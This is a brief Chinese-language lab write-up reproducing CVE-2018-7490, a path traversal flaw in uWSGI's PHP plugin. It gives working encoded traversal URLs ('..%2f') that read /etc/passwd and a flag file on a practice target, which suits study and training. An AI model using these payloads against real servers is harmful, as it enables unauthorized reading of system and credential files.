uWSGI 漏洞复现(CVE-2018-7490)
CVE-2018-7490
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞是由于请求通过“php docroot”指定的DOCUMENT_ROOT目录下的资源时对文件路径的验证不正确造成的。
在没有指定“PHP allowed docroot”选项的情况下,2.0.17之前的uWSGI PHP插件容易被目录遍历。
远程攻击者可以利用此漏洞,使用路径遍历序列(“…%2f”)从易受攻击的系统中读取任意文件。
靶场
目标:利用漏洞获取根目录key.txt的值
step 1:
用…/测试,…/ 被过滤,不能生效
step 2:
使用URL编码:‘ %2f ’=‘ / ’
URL:http://219.153.49.228:xxxxx/..%2f/..%2f/..%2f/etc/passwd
URL:http://219.153.49.228:xxxx/..%2f/..%2f/..%2f/key.txt